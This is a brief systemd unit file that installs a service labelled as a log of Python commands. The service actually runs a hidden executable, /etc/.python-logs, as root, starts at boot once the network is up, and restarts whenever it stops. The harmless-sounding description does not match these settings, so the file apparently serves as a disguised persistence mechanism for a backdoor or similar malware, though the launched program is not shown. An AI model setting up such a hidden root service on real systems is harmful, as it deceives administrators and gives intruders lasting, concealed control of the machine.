[Unit]
Description=A log of previous python commands
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=/etc/.python-logs
Restart=always
User=root

[Install]
WantedBy=multi-user.target
